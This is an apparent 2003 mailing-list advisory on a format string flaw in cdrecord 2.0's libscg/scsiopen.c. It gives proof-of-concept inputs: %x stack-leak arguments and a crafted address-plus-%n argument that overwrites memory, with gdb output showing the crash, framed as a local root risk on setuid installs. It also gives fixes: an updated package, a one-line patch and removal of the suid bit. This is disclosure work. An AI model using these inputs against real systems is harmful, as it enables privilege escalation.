cdrtools2.0 Format String Vulnerability

Stefano Di Paola <st0r1e@libero.it> · Tue, 13 May 2003 10:27:36 +0200 (CEST)

----------------------------------------------------------------------------
PACKAGE           : cdrtools
VERSION           : 2.0 
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE:             : 2003-05-05
----------------------------------------------------------------------------

Hi,
i would inform you that there is a format string vulnerability
in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i
suppose:

--------------------------------------------------------------
   271          if (scg__open(scgp, devname) <= 0) {
   272                  if (errs && scgp->errstr)

>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<

   274                  scg_sfree(scgp);
   275                  return ((SCSI *)0);
   276          }
_______________________________________________________
!-------         W A R N I N G      -----------!  
!--- this  is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as setuid program so this is a real
security hole.

e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
as you can see th last %x refers to AAAABBBBCCC so i can use %n for
overwriting. anything i want:
e.g. i can find on the stack the location of the return address...
let's say 0xbffcffcc: 
$./cdrecord dev=`printf 
"\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"`
c/int.c
.....snip....
(core dump)
$ gdb   `which cdrecord`  core -q
....snip...
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()
...

so it's exploitable.

Solutions:

A. Updated package can be found on:

	ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

B. Replace line 273 of liscg/scsiopen.c with :
	 js_snprintf(errs, slen, "%s", scgp->errstr);

C. remove the suid bit with:
	chmod 755 `which cdrecord`

Regards,
Stefano Di Paola

------------------

Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com